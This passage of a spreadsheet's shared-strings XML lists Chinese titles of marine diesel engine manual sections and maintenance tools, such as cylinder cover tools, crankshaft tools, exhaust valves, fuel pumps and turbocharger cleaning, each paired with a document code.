    <t xml:space="preserve">油泵特殊运行                                            </t>
  </si>
  <si>
    <t>CD0916</t>
  </si>
  <si>
    <t xml:space="preserve">空冷器元件                                             </t>
  </si>
  <si>
    <t>CD1001</t>
  </si>
  <si>
    <t xml:space="preserve">增压器单向阀                                            </t>
  </si>
  <si>
    <t>CD1002</t>
  </si>
  <si>
    <t>CD1003</t>
  </si>
  <si>
    <t xml:space="preserve">涡轮                                                </t>
  </si>
  <si>
    <t>CD1005</t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱安全阀                                            </t>
  </si>
  <si>
    <t>CD1103</t>
  </si>
  <si>
    <t xml:space="preserve">铸铁垫块底脚/端支撑螺栓                                      </t>
  </si>
  <si>
    <t>CD1201</t>
  </si>
  <si>
    <t xml:space="preserve">环氧垫块底脚/端支撑螺栓                                      </t>
  </si>
  <si>
    <t>CD1202</t>
  </si>
  <si>
    <t>CD1203</t>
  </si>
  <si>
    <t>CD1303</t>
  </si>
  <si>
    <t xml:space="preserve">安全指导                                              </t>
  </si>
  <si>
    <t>CI0100</t>
  </si>
  <si>
    <t xml:space="preserve">指导                                                </t>
  </si>
  <si>
    <t>CI3010</t>
  </si>
  <si>
    <t>CM0302</t>
  </si>
  <si>
    <t>CM0404</t>
  </si>
  <si>
    <t>CM0501</t>
  </si>
  <si>
    <t>CM0508</t>
  </si>
  <si>
    <t>CM0604</t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴上更换凸轮                                          </t>
  </si>
  <si>
    <t>CM0606</t>
  </si>
  <si>
    <t>CM0620</t>
  </si>
  <si>
    <t>CM0623</t>
  </si>
  <si>
    <t>CM0624</t>
  </si>
  <si>
    <t>CM0626</t>
  </si>
  <si>
    <t>CM0801</t>
  </si>
  <si>
    <t xml:space="preserve">排气阀执行器                                            </t>
  </si>
  <si>
    <t>CM0803</t>
  </si>
  <si>
    <t>CM0804</t>
  </si>
  <si>
    <t>CM0805</t>
  </si>
  <si>
    <t>CM0901</t>
  </si>
  <si>
    <t>CM0903</t>
  </si>
  <si>
    <t>CM0905</t>
  </si>
  <si>
    <t xml:space="preserve">油泵柱塞安装                                            </t>
  </si>
  <si>
    <t>CM0906</t>
  </si>
  <si>
    <t xml:space="preserve">油泵吸油阀                                             </t>
  </si>
  <si>
    <t>CM0907</t>
  </si>
  <si>
    <t xml:space="preserve">油泵泄放阀                                             </t>
  </si>
  <si>
    <t>CM0908</t>
  </si>
  <si>
    <t>CM0909</t>
  </si>
  <si>
    <t>CM0914</t>
  </si>
  <si>
    <t>CM0916</t>
  </si>
  <si>
    <t>CM1001</t>
  </si>
  <si>
    <t>CM1003</t>
  </si>
  <si>
    <t>CM1004</t>
  </si>
  <si>
    <t xml:space="preserve">标准拧紧力矩                                            </t>
  </si>
  <si>
    <t>CM1304</t>
  </si>
  <si>
    <t xml:space="preserve">螺丝和螺母                                             </t>
  </si>
  <si>
    <t>CM1307</t>
  </si>
  <si>
    <t xml:space="preserve">液压环                                               </t>
  </si>
  <si>
    <t>CM1310</t>
  </si>
  <si>
    <t xml:space="preserve">润滑                                                </t>
  </si>
  <si>
    <t>CM1311</t>
  </si>
  <si>
    <t xml:space="preserve">主机横截面图                                            </t>
  </si>
  <si>
    <t>CP0001</t>
  </si>
  <si>
    <t xml:space="preserve">缸盖工具板                                             </t>
  </si>
  <si>
    <t>CP0151</t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖研磨工具                                           </t>
  </si>
  <si>
    <t>CP0162</t>
  </si>
  <si>
    <t xml:space="preserve">缸盖支撑工具                                            </t>
  </si>
  <si>
    <t>CP0163</t>
  </si>
  <si>
    <t xml:space="preserve">缸盖液压工具备件                                          </t>
  </si>
  <si>
    <t>CP0164</t>
  </si>
  <si>
    <t>CP0165</t>
  </si>
  <si>
    <t xml:space="preserve">活塞和活塞杆                                            </t>
  </si>
  <si>
    <t>CP0201</t>
  </si>
  <si>
    <t xml:space="preserve">活塞和活塞杆工具板                                         </t>
  </si>
  <si>
    <t>CP0251</t>
  </si>
  <si>
    <t xml:space="preserve">活塞和活塞杆工具                                          </t>
  </si>
  <si>
    <t>CP0261</t>
  </si>
  <si>
    <t xml:space="preserve">活塞和活塞杆液压工具                                        </t>
  </si>
  <si>
    <t>CP0262</t>
  </si>
  <si>
    <t xml:space="preserve">活塞头液压工具                                           </t>
  </si>
  <si>
    <t>CP0263</t>
  </si>
  <si>
    <t xml:space="preserve">活塞和活塞杆额外工具                                        </t>
  </si>
  <si>
    <t>CP0264</t>
  </si>
  <si>
    <t xml:space="preserve">活塞和活塞杆支撑工具                                        </t>
  </si>
  <si>
    <t>CP0265</t>
  </si>
  <si>
    <t>CP0266</t>
  </si>
  <si>
    <t xml:space="preserve">缸套和冷却水套                                           </t>
  </si>
  <si>
    <t>CP0302</t>
  </si>
  <si>
    <t xml:space="preserve">气缸体，详图                                            </t>
  </si>
  <si>
    <t>CP0303</t>
  </si>
  <si>
    <t xml:space="preserve">气缸套，详图                                            </t>
  </si>
  <si>
    <t>CP0304</t>
  </si>
  <si>
    <t>CP0305</t>
  </si>
  <si>
    <t xml:space="preserve">气缸注油器详细资料                                         </t>
  </si>
  <si>
    <t>CP0306</t>
  </si>
  <si>
    <t xml:space="preserve">气缸注油器组件                                           </t>
  </si>
  <si>
    <t>CP0307</t>
  </si>
  <si>
    <t>CP0309</t>
  </si>
  <si>
    <t xml:space="preserve">气缸体排气侧螺栓                                          </t>
  </si>
  <si>
    <t>CP0310</t>
  </si>
  <si>
    <t xml:space="preserve">气缸润滑电子零件                                          </t>
  </si>
  <si>
    <t>CP0312</t>
  </si>
  <si>
    <t xml:space="preserve">气缸套，工具                                            </t>
  </si>
  <si>
    <t>CP0361</t>
  </si>
  <si>
    <t xml:space="preserve">缸套额外工具                                            </t>
  </si>
  <si>
    <t>CP0362</t>
  </si>
  <si>
    <t xml:space="preserve">缸套珩磨工具                                            </t>
  </si>
  <si>
    <t>CP0363</t>
  </si>
  <si>
    <t xml:space="preserve">注油器测试设备                                           </t>
  </si>
  <si>
    <t>CP0364</t>
  </si>
  <si>
    <t>CP0366</t>
  </si>
  <si>
    <t xml:space="preserve">连杆十字头总成                                           </t>
  </si>
  <si>
    <t>CP0401</t>
  </si>
  <si>
    <t xml:space="preserve">连杆十字头详图                                           </t>
  </si>
  <si>
    <t>CP0402</t>
  </si>
  <si>
    <t xml:space="preserve">润滑和冷却油流量                                          </t>
  </si>
  <si>
    <t>CP0403</t>
  </si>
  <si>
    <t xml:space="preserve">连杆和十字头工具板                                         </t>
  </si>
  <si>
    <t>CP0451</t>
  </si>
  <si>
    <t xml:space="preserve">连杆液压工具                                            </t>
  </si>
  <si>
    <t>CP0461</t>
  </si>
  <si>
    <t>CP0462</t>
  </si>
  <si>
    <t xml:space="preserve">十字头，液压工具                                          </t>
  </si>
  <si>
    <t>CP0464</t>
  </si>
  <si>
    <t xml:space="preserve">十字头，工具                                            </t>
  </si>
  <si>
    <t>CP0465</t>
  </si>
  <si>
    <t>CP0502</t>
  </si>
  <si>
    <t xml:space="preserve">角度编码器布置                                           </t>
  </si>
  <si>
    <t>CP0503</t>
  </si>
  <si>
    <t xml:space="preserve">推力+导向轴承                                           </t>
  </si>
  <si>
    <t>CP0505</t>
  </si>
  <si>
    <t xml:space="preserve">前端带PTO的布置                                         </t>
  </si>
  <si>
    <t>CP0506</t>
  </si>
  <si>
    <t xml:space="preserve">触发环和传感器                                           </t>
  </si>
  <si>
    <t>CP0507</t>
  </si>
  <si>
    <t xml:space="preserve">扭振监控系统                                            </t>
  </si>
  <si>
    <t>CP0508</t>
  </si>
  <si>
    <t xml:space="preserve">盘车机详细资料                                           </t>
  </si>
  <si>
    <t>CP0512</t>
  </si>
  <si>
    <t xml:space="preserve">转速计装置                                             </t>
  </si>
  <si>
    <t>CP0513</t>
  </si>
  <si>
    <t xml:space="preserve">曲轴、推力轴工具板                                         </t>
  </si>
  <si>
    <t>CP0551</t>
  </si>
  <si>
    <t>CP0561</t>
  </si>
  <si>
    <t xml:space="preserve">曲轴，工具                                             </t>
  </si>
  <si>
    <t>CP0562</t>
  </si>
  <si>
    <t xml:space="preserve">推力块停止液压工具                                         </t>
  </si>
  <si>
    <t>CP0563</t>
  </si>
  <si>
    <t xml:space="preserve">曲轴，测量工具                                           </t>
  </si>
  <si>
    <t>CP0564</t>
  </si>
  <si>
    <t>CP0565</t>
  </si>
  <si>
    <t xml:space="preserve">曲轴，液压工具                                           </t>
  </si>
  <si>
    <t>CP0566</t>
  </si>
  <si>
    <t xml:space="preserve">推力块停止/减振工具                                        </t>
  </si>
  <si>
    <t>CP0567</t>
  </si>
  <si>
    <t xml:space="preserve">平衡重，工具                                            </t>
  </si>
  <si>
    <t>CP0568</t>
  </si>
  <si>
    <t xml:space="preserve">盘车机工具                                             </t>
  </si>
  <si>
    <t>CP0569</t>
  </si>
  <si>
    <t xml:space="preserve">推力轴工具                                             </t>
  </si>
  <si>
    <t>CP0570</t>
  </si>
  <si>
    <t xml:space="preserve">主轴瓦工具                                             </t>
  </si>
  <si>
    <t>CP0571</t>
  </si>
  <si>
    <t xml:space="preserve">主轴承测量工具                                           </t>
  </si>
  <si>
    <t>CP0572</t>
  </si>
  <si>
    <t xml:space="preserve">调频轮工具                                             </t>
  </si>
  <si>
    <t>CP0573</t>
  </si>
  <si>
    <t xml:space="preserve">轴向减振器，液压工具                                        </t>
  </si>
  <si>
    <t>CP0574</t>
  </si>
  <si>
    <t xml:space="preserve">链条传动及凸轮布置                                         </t>
  </si>
  <si>
    <t>CP0600</t>
  </si>
  <si>
    <t xml:space="preserve">链传动和导轨                                            </t>
  </si>
  <si>
    <t>CP0601</t>
  </si>
  <si>
    <t xml:space="preserve">链传动，润滑                                            </t>
  </si>
  <si>
    <t>CP0602</t>
  </si>
  <si>
    <t xml:space="preserve">中间链轮                                              </t>
  </si>
  <si>
    <t>CP0604</t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴和链轮                                            </t>
  </si>
  <si>
    <t>CP0611</t>
  </si>
  <si>
    <t xml:space="preserve">示功装置布置                                            </t>
  </si>
  <si>
    <t>CP0612</t>
  </si>
  <si>
    <t>CP0613</t>
  </si>
  <si>
    <t xml:space="preserve">调速器布置                                             </t>
  </si>
  <si>
    <t>CP0615</t>
  </si>
  <si>
    <t xml:space="preserve">负荷传感器                                             </t>
  </si>
  <si>
    <t>CP0619</t>
  </si>
  <si>
    <t xml:space="preserve">主机机侧控制台                                           </t>
  </si>
  <si>
    <t>CP0620</t>
  </si>
  <si>
    <t xml:space="preserve">主机机侧控制                                            </t>
  </si>
  <si>
    <t>CP0621</t>
  </si>
  <si>
    <t xml:space="preserve">副轴布置                                              </t>
  </si>
  <si>
    <t>CP0622</t>
  </si>
  <si>
    <t xml:space="preserve">力矩补偿器链条张紧装置                                       </t>
  </si>
  <si>
    <t>CP0626</t>
  </si>
  <si>
    <t xml:space="preserve">力矩补偿器润滑                                           </t>
  </si>
  <si>
    <t>CP0627</t>
  </si>
  <si>
    <t xml:space="preserve">力矩补偿器本体                                           </t>
  </si>
  <si>
    <t>CP0629</t>
  </si>
  <si>
    <t xml:space="preserve">链传动导轨，上部                                          </t>
  </si>
  <si>
    <t>CP0631</t>
  </si>
  <si>
    <t xml:space="preserve">链传动导轨，下部                                          </t>
  </si>
  <si>
    <t>CP0632</t>
  </si>
  <si>
    <t xml:space="preserve">注油器链条上部                                           </t>
  </si>
  <si>
    <t>CP0633</t>
  </si>
  <si>
    <t xml:space="preserve">注油器链条下部                                           </t>
  </si>
  <si>
    <t>CP0634</t>
  </si>
  <si>
    <t xml:space="preserve">液压缸单元详细资料                                         </t>
  </si>
  <si>
    <t>CP0636</t>
  </si>
  <si>
    <t xml:space="preserve">液压动力供应驱动                                          </t>
  </si>
  <si>
    <t>CP0638</t>
  </si>
  <si>
    <t xml:space="preserve">液力能源系统驱动详细资料                                      </t>
  </si>
  <si>
    <t>CP0639</t>
  </si>
  <si>
    <t xml:space="preserve">液力能源系统蓄压器                                         </t>
  </si>
  <si>
    <t>CP0641</t>
  </si>
  <si>
    <t xml:space="preserve">液力能源系统低压系统                                        </t>
  </si>
  <si>
    <t>CP0643</t>
  </si>
  <si>
    <t xml:space="preserve">液力能源系统高压系统                                        </t>
  </si>
  <si>
    <t>CP0644</t>
  </si>
  <si>
    <t xml:space="preserve">主机控制电子部件                                          </t>
  </si>
  <si>
    <t>CP0645</t>
  </si>
  <si>
    <t xml:space="preserve">滑油系统电子部件                                          </t>
  </si>
  <si>
    <t>CP0646</t>
  </si>
  <si>
    <t xml:space="preserve">主机控制室                                             </t>
  </si>
  <si>
    <t>CP0647</t>
  </si>
  <si>
    <t xml:space="preserve">气动部件                                              </t>
  </si>
  <si>
    <t>CP0648</t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴链传动                                            </t>
  </si>
  <si>
    <t>CP0651</t>
  </si>
  <si>
    <t xml:space="preserve">电动部件工具                                            </t>
  </si>
  <si>
    <t>CP0655</t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴链条工具                                           </t>
  </si>
  <si>
    <t>CP0661</t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴液压工具                                           </t>
  </si>
  <si>
    <t>CP0662</t>
  </si>
  <si>
    <t>CP0664</t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴联轴节液压工具                                        </t>
  </si>
  <si>
    <t>CP0666</t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴定位量规                                           </t>
  </si>
  <si>
    <t>CP0668</t>
  </si>
  <si>
    <t>CP0669</t>
  </si>
  <si>
    <t xml:space="preserve">链轮张紧液压工具                                          </t>
  </si>
  <si>
    <t>CP0671</t>
  </si>
  <si>
    <t xml:space="preserve">空气分配器驱动                                           </t>
  </si>
  <si>
    <t>CP0705</t>
  </si>
  <si>
    <t xml:space="preserve">控制空气系统                                            </t>
  </si>
  <si>
    <t>CP0709</t>
  </si>
  <si>
    <t xml:space="preserve">排气阀下部                                             </t>
  </si>
  <si>
    <t>CP0801</t>
  </si>
  <si>
    <t xml:space="preserve">排气阀详图                                             </t>
  </si>
  <si>
    <t>CP0802</t>
  </si>
  <si>
    <t xml:space="preserve">排气阀上部                                             </t>
  </si>
  <si>
    <t>CP0803</t>
  </si>
  <si>
    <t>CP0804</t>
  </si>
  <si>
    <t xml:space="preserve">排气阀管子系统                                           </t>
  </si>
  <si>
    <t>CP0806</t>
  </si>
  <si>
    <t>CP0807</t>
  </si>
  <si>
    <t xml:space="preserve">冷却水管布置                                            </t>
  </si>
  <si>
    <t>CP0810</t>
  </si>
  <si>
    <t xml:space="preserve">淡水管布置                                             </t>
  </si>
  <si>
    <t>CP0811</t>
  </si>
  <si>
    <t xml:space="preserve">淡水泄放管布置                                           </t>
  </si>
  <si>
    <t>CP0812</t>
  </si>
  <si>
    <t xml:space="preserve">排气阀工具板                                            </t>
  </si>
  <si>
    <t>CP0851</t>
  </si>
  <si>
    <t>CP0861</t>
  </si>
  <si>
    <t xml:space="preserve">排气阀，液压工具                                          </t>
  </si>
  <si>
    <t>CP0862</t>
  </si>
  <si>
    <t xml:space="preserve">排气阀，额外工具                                          </t>
  </si>
  <si>
    <t>CP0863</t>
  </si>
  <si>
    <t xml:space="preserve">排气阀取出工具                                           </t>
  </si>
  <si>
    <t>CP0864</t>
  </si>
  <si>
    <t xml:space="preserve">排气阀执行器，工具                                         </t>
  </si>
  <si>
    <t>CP0865</t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵齿轮                                             </t>
  </si>
  <si>
    <t>CP0902</t>
  </si>
  <si>
    <t>CP0903</t>
  </si>
  <si>
    <t>CP0904</t>
  </si>
  <si>
    <t>CP0906</t>
  </si>
  <si>
    <t>CP0907</t>
  </si>
  <si>
    <t xml:space="preserve">喷油泵，流量图                                           </t>
  </si>
  <si>
    <t>CP0908</t>
  </si>
  <si>
    <t>CP0911</t>
  </si>
  <si>
    <t>CP0913</t>
  </si>
  <si>
    <t>CP0915</t>
  </si>
  <si>
    <t xml:space="preserve">1号气缸燃油泵提升工具                                       </t>
  </si>
  <si>
    <t>CP0916</t>
  </si>
  <si>
    <t xml:space="preserve">燃油压力促动泵                                           </t>
  </si>
  <si>
    <t>CP0917</t>
  </si>
  <si>
    <t xml:space="preserve">喷油器、燃油泵工具板                                        </t>
  </si>
  <si>
    <t>CP0951</t>
  </si>
  <si>
    <t xml:space="preserve">喷油器，工具                                            </t>
  </si>
  <si>
    <t>CP0961</t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵密封安装工具                                         </t>
  </si>
  <si>
    <t>CP0962</t>
  </si>
  <si>
    <t>CP0963</t>
  </si>
  <si>
    <t xml:space="preserve">喷油泵，工具                                            </t>
  </si>
  <si>
    <t>CP0964</t>
  </si>
  <si>
    <t xml:space="preserve">气阀，工具                                             </t>
  </si>
  <si>
    <t>CP0965</t>
  </si>
  <si>
    <t>CP0966</t>
  </si>
  <si>
    <t xml:space="preserve">燃油泄放阀，工具                                          </t>
  </si>
  <si>
    <t>CP0967</t>
  </si>
  <si>
    <t xml:space="preserve">喷油器检查工具                                           </t>
  </si>
  <si>
    <t>CP0968</t>
  </si>
  <si>
    <t xml:space="preserve">喷油泵，提升工具                                          </t>
  </si>
  <si>
    <t>CP0969</t>
  </si>
  <si>
    <t xml:space="preserve">可挥发有机成分压力测试                                       </t>
  </si>
  <si>
    <t>CP0970</t>
  </si>
  <si>
    <t xml:space="preserve">喷油器，额外工具                                          </t>
  </si>
  <si>
    <t>CP0972</t>
  </si>
  <si>
    <t xml:space="preserve">喷油器喷嘴清洗工具                                         </t>
  </si>
  <si>
    <t>CP0974</t>
  </si>
  <si>
    <t xml:space="preserve">可挥发有机成分阀测试工具                                      </t>
  </si>
  <si>
    <t>CP0976</t>
  </si>
  <si>
    <t xml:space="preserve">增压器系统                                             </t>
  </si>
  <si>
    <t>CP1000</t>
  </si>
  <si>
    <t>CP1002</t>
  </si>
  <si>
    <t xml:space="preserve">排烟管和扫气箱                                           </t>
  </si>
  <si>
    <t>CP1003</t>
  </si>
  <si>
    <t>CP1004</t>
  </si>
  <si>
    <t>CP1005</t>
  </si>
  <si>
    <t xml:space="preserve">辅助鼓风机布置                                           </t>
  </si>
  <si>
    <t>CP1006</t>
  </si>
  <si>
    <t xml:space="preserve">增压器密封空气系统                                         </t>
  </si>
  <si>
    <t>CP1008</t>
  </si>
  <si>
    <t>CP1009</t>
  </si>
  <si>
    <t xml:space="preserve">空冷器框架                                             </t>
  </si>
  <si>
    <t>CP1010</t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱底板                                             </t>
  </si>
  <si>
    <t>CP1012</t>
  </si>
  <si>
    <t xml:space="preserve">空冷器起重横梁                                           </t>
  </si>
  <si>
    <t>CP1013</t>
  </si>
  <si>
    <t>CP1014</t>
  </si>
  <si>
    <t xml:space="preserve">空冷器系统                                             </t>
  </si>
  <si>
    <t>CP1018</t>
  </si>
  <si>
    <t xml:space="preserve">空冷器+增压器工具板                                        </t>
  </si>
  <si>
    <t>CP1051</t>
  </si>
  <si>
    <t xml:space="preserve">增压器工具板                                            </t>
  </si>
  <si>
    <t>CP1052</t>
  </si>
  <si>
    <t xml:space="preserve">K90MC，增压器工具板                                      </t>
  </si>
  <si>
    <t>CP1053</t>
  </si>
  <si>
    <t>CP1061</t>
  </si>
  <si>
    <t xml:space="preserve">增压器转子清洗                                           </t>
  </si>
  <si>
    <t>CP1062</t>
  </si>
  <si>
    <t>CP1063</t>
  </si>
  <si>
    <t xml:space="preserve">排气集管工具                                            </t>
  </si>
  <si>
    <t>CP1065</t>
  </si>
  <si>
    <t>CP1066</t>
  </si>
  <si>
    <t xml:space="preserve">气缸安全阀                                             </t>
  </si>
  <si>
    <t>CP1101</t>
  </si>
  <si>
    <t xml:space="preserve">扫气系统安全阀                                           </t>
  </si>
  <si>
    <t>CP1103</t>
  </si>
  <si>
    <t xml:space="preserve">安全帽布置                                             </t>
  </si>
  <si>
    <t>CP1104</t>
  </si>
  <si>
    <t>CP1161</t>
  </si>
  <si>
    <t xml:space="preserve">贯穿螺栓布置                                            </t>
  </si>
  <si>
    <t>CP1201</t>
  </si>
  <si>
    <t>CP1203</t>
  </si>
  <si>
    <t>CP1206</t>
  </si>
  <si>
    <t xml:space="preserve">活塞冷却布置                                            </t>
  </si>
  <si>
    <t>CP1207</t>
  </si>
  <si>
    <t xml:space="preserve">铸铁垫块地脚/端部螺栓                                       </t>
  </si>
  <si>
    <t>CP1215</t>
  </si>
  <si>
    <t xml:space="preserve">环氧垫块地脚/端部螺栓                                       </t>
  </si>
  <si>
    <t>CP1216</t>
  </si>
  <si>
    <t xml:space="preserve">大件工具                                              </t>
  </si>
  <si>
    <t>CP1261</t>
  </si>
  <si>
    <t xml:space="preserve">环氧垫块地脚螺栓液压工具                                      </t>
  </si>
  <si>
    <t>CP1265</t>
  </si>
  <si>
    <t xml:space="preserve">铸铁垫块地脚螺栓液压工具                                      </t>
  </si>
  <si>
    <t>CP1267</t>
  </si>
  <si>
    <t>CP1351</t>
  </si>
  <si>
    <t>CP1352</t>
  </si>
  <si>
    <t xml:space="preserve">上紧指导                                              </t>
  </si>
  <si>
    <t>CP1353</t>
  </si>
  <si>
    <t>CP1356</t>
  </si>
  <si>
    <t>CP1359</t>
  </si>
  <si>
    <t xml:space="preserve">钳子                                                </t>
  </si>
  <si>
    <t>CP1360</t>
  </si>
  <si>
    <t>CP1361</t>
  </si>
  <si>
    <t>CP1362</t>
  </si>
  <si>
    <t>CP1363</t>
  </si>
  <si>
    <t>CP1364</t>
  </si>
  <si>
    <t xml:space="preserve">扳手等                                               </t>
  </si>
  <si>
    <t>CP1367</t>
  </si>
  <si>
    <t xml:space="preserve">电压监控系统文件                                          </t>
  </si>
  <si>
    <t>D41610</t>
  </si>
  <si>
    <t xml:space="preserve">ME电控系统参数设置                                        </t>
  </si>
  <si>
    <t>D44117</t>
  </si>
  <si>
    <t xml:space="preserve">轴向减振器系统，文件                                        </t>
  </si>
  <si>
    <t>D93300</t>
  </si>
  <si>
    <t xml:space="preserve">警告                                                </t>
  </si>
  <si>
    <t>HA0000</t>
  </si>
  <si>
    <t xml:space="preserve">发电机组主数据                                           </t>
  </si>
  <si>
    <t>HD0000</t>
  </si>
  <si>
    <t xml:space="preserve">介绍                                                </t>
  </si>
  <si>
    <t>HD0001</t>
  </si>
  <si>
    <t xml:space="preserve">安全                                                </t>
  </si>
  <si>
    <t>HD0002</t>
  </si>
  <si>
    <t xml:space="preserve">横截面图                                              </t>
  </si>
  <si>
    <t>HD0005</t>
  </si>
  <si>
    <t xml:space="preserve">柴油机关键指标                                           </t>
  </si>
  <si>
    <t>HD0010</t>
  </si>
  <si>
    <t xml:space="preserve">气缸指示                                              </t>
  </si>
  <si>
    <t>HD0011</t>
  </si>
  <si>
    <t xml:space="preserve">主机顺时钟旋转                                           </t>
  </si>
  <si>
    <t>HD0012</t>
  </si>
  <si>
    <t xml:space="preserve">说明识别号                                             </t>
  </si>
  <si>
    <t>HD0020</t>
  </si>
  <si>
    <t xml:space="preserve">维护程序介绍                                            </t>
  </si>
  <si>
    <t>HD0024</t>
  </si>
  <si>
    <t xml:space="preserve">维护操作程序计划维护                                        </t>
  </si>
  <si>
    <t>HD0025</t>
  </si>
  <si>
    <t xml:space="preserve">操作程序计划维护                                          </t>
  </si>
  <si>
    <t>HD0026</t>
  </si>
  <si>
    <t xml:space="preserve">操作参数和设定值                                          </t>
  </si>
  <si>
    <t>HD0030</t>
  </si>
  <si>
    <t xml:space="preserve">压力和公差数据                                           </t>
  </si>
  <si>
    <t>HD0035</t>
  </si>
  <si>
    <t xml:space="preserve">力矩数据                                              </t>
  </si>
  <si>
    <t>HD0040</t>
  </si>
  <si>
    <t xml:space="preserve">重量说明                                              </t>
  </si>
  <si>
    <t>HD0045</t>
  </si>
  <si>
    <t xml:space="preserve">备件订单                                              </t>
  </si>
  <si>
    <t>HD0050</t>
  </si>
  <si>
    <t xml:space="preserve">服务通函                                              </t>
  </si>
  <si>
    <t>HD0055</t>
  </si>
  <si>
    <t xml:space="preserve">转换表                                               </t>
  </si>
  <si>
    <t>HD0060</t>
  </si>
  <si>
    <t>HD0065</t>
  </si>
  <si>
    <t xml:space="preserve">操作                                                </t>
  </si>
  <si>
    <t>HD0101</t>
  </si>
  <si>
    <t xml:space="preserve">退役                                                </t>
  </si>
  <si>
    <t>HD0105</t>
  </si>
  <si>
    <t xml:space="preserve">维修后启动                                             </t>
  </si>
  <si>
    <t>HD0110</t>
  </si>
  <si>
    <t xml:space="preserve">重油低负荷运行                                           </t>
  </si>
  <si>
    <t>HD0115</t>
  </si>
  <si>
    <t xml:space="preserve">低速运行                                              </t>
  </si>
  <si>
    <t>HD0125</t>
  </si>
  <si>
    <t xml:space="preserve">主机性能和工况                                           </t>
  </si>
  <si>
    <t>HD0201</t>
  </si>
  <si>
    <t xml:space="preserve">燃烧状况评估                                            </t>
  </si>
  <si>
    <t>HD0202</t>
  </si>
  <si>
    <t xml:space="preserve">冷凝液量                                              </t>
  </si>
  <si>
    <t>HD0205</t>
  </si>
  <si>
    <t xml:space="preserve">启动失败                                              </t>
  </si>
  <si>
    <t>HD0301</t>
  </si>
  <si>
    <t xml:space="preserve">燃油系统故障                                            </t>
  </si>
  <si>
    <t>HD0302</t>
  </si>
  <si>
    <t xml:space="preserve">运行变形                                              </t>
  </si>
  <si>
    <t>HD0303</t>
  </si>
  <si>
    <t xml:space="preserve">曲轴箱着火                                             </t>
  </si>
  <si>
    <t>HD0304</t>
  </si>
  <si>
    <t>HD0401</t>
  </si>
  <si>
    <t xml:space="preserve">滑油箱维护                                             </t>
  </si>
  <si>
    <t>HD0403</t>
  </si>
  <si>
    <t xml:space="preserve">滑油更换/调换标准                                         </t>
  </si>
  <si>
    <t>HD0404</t>
  </si>
  <si>
    <t xml:space="preserve">润滑点                                               </t>
  </si>
  <si>
    <t>HD0405</t>
  </si>
  <si>
    <t xml:space="preserve">机座内滑油                                             </t>
  </si>
  <si>
    <t>HD0406</t>
  </si>
  <si>
    <t>HD0420</t>
  </si>
  <si>
    <t xml:space="preserve">燃油质量                                              </t>
  </si>
  <si>
    <t>HD0425</t>
  </si>
  <si>
    <t xml:space="preserve">分析数据                                              </t>
  </si>
  <si>
    <t>HD0427</t>
  </si>
  <si>
    <t xml:space="preserve">燃烧压力比较                                            </t>
  </si>
  <si>
    <t>HD0428</t>
  </si>
  <si>
    <t xml:space="preserve">燃油清洁                                              </t>
  </si>
  <si>
    <t>HD0430</t>
  </si>
  <si>
    <t xml:space="preserve">淡水系统处理                                            </t>
  </si>
  <si>
    <t>HD0440</t>
  </si>
  <si>
    <t xml:space="preserve">缸头                                                </t>
  </si>
  <si>
    <t>HD0501</t>
  </si>
  <si>
    <t xml:space="preserve">活塞，连杆和缸套                                          </t>
  </si>
  <si>
    <t>HD0601</t>
  </si>
  <si>
    <t xml:space="preserve">凸轮和凸轮驱动                                           </t>
  </si>
  <si>
    <t>HD0701</t>
  </si>
  <si>
    <t xml:space="preserve">阀操作齿轮                                             </t>
  </si>
  <si>
    <t>HD0801</t>
  </si>
  <si>
    <t xml:space="preserve">控制和安全系统                                           </t>
  </si>
  <si>
    <t>HD0901</t>
  </si>
  <si>
    <t xml:space="preserve">仪表和自动化                                            </t>
  </si>
  <si>
    <t>HD0905</t>
  </si>
  <si>
    <t xml:space="preserve">Lambda控制器                                         </t>
  </si>
  <si>
    <t>HD0910</t>
  </si>
  <si>
    <t xml:space="preserve">发动机转换器                                            </t>
  </si>
  <si>
    <t>HD0940</t>
  </si>
  <si>
    <t xml:space="preserve">发电机组零件                                            </t>
  </si>
  <si>
    <t>HD0955</t>
  </si>
  <si>
    <t xml:space="preserve">曲柄销轴承/主轴承                                         </t>
  </si>
  <si>
    <t>HD1001</t>
  </si>
  <si>
    <t xml:space="preserve">柴油机框架                                             </t>
  </si>
  <si>
    <t>HD1101</t>
  </si>
  <si>
    <t>HD1201</t>
  </si>
  <si>
    <t xml:space="preserve">增压器清洗水管                                           </t>
  </si>
  <si>
    <t>HD1205</t>
  </si>
  <si>
    <t xml:space="preserve">增压器压气端干洗                                          </t>
  </si>
  <si>
    <t>HD1210</t>
  </si>
  <si>
    <t xml:space="preserve">增压器透平端水洗                                          </t>
  </si>
  <si>
    <t>HD1215</t>
  </si>
  <si>
    <t>HD1301</t>
  </si>
  <si>
    <t xml:space="preserve">内部燃油系统                                            </t>
  </si>
  <si>
    <t>HD1401</t>
  </si>
  <si>
    <t>HD1425</t>
  </si>
  <si>
    <t xml:space="preserve">内部滑油系统                                            </t>
  </si>
  <si>
    <t>HD1501</t>
  </si>
  <si>
    <t xml:space="preserve">滑油温控阀                                             </t>
  </si>
  <si>
    <t>HD1503</t>
  </si>
  <si>
    <t xml:space="preserve">滑油冷却器                                             </t>
  </si>
  <si>
    <t>HD1506</t>
  </si>
  <si>
    <t xml:space="preserve">离心旁通滤器                                            </t>
  </si>
  <si>
    <t>HD1515</t>
  </si>
  <si>
    <t xml:space="preserve">内部冷却水系统                                           </t>
  </si>
  <si>
    <t>HD1601</t>
  </si>
  <si>
    <t xml:space="preserve">冷却水温控阀                                            </t>
  </si>
  <si>
    <t>HD1604</t>
  </si>
  <si>
    <t>HD1903</t>
  </si>
  <si>
    <t xml:space="preserve">备件介绍                                              </t>
  </si>
  <si>
    <t>HD2001</t>
  </si>
  <si>
    <t xml:space="preserve">主机性能数据                                            </t>
  </si>
  <si>
    <t>HM0201</t>
  </si>
  <si>
    <t xml:space="preserve">从检查孔检查泄漏                                          </t>
  </si>
  <si>
    <t>HM0205</t>
  </si>
  <si>
    <t xml:space="preserve">主机缸体拆装                                            </t>
  </si>
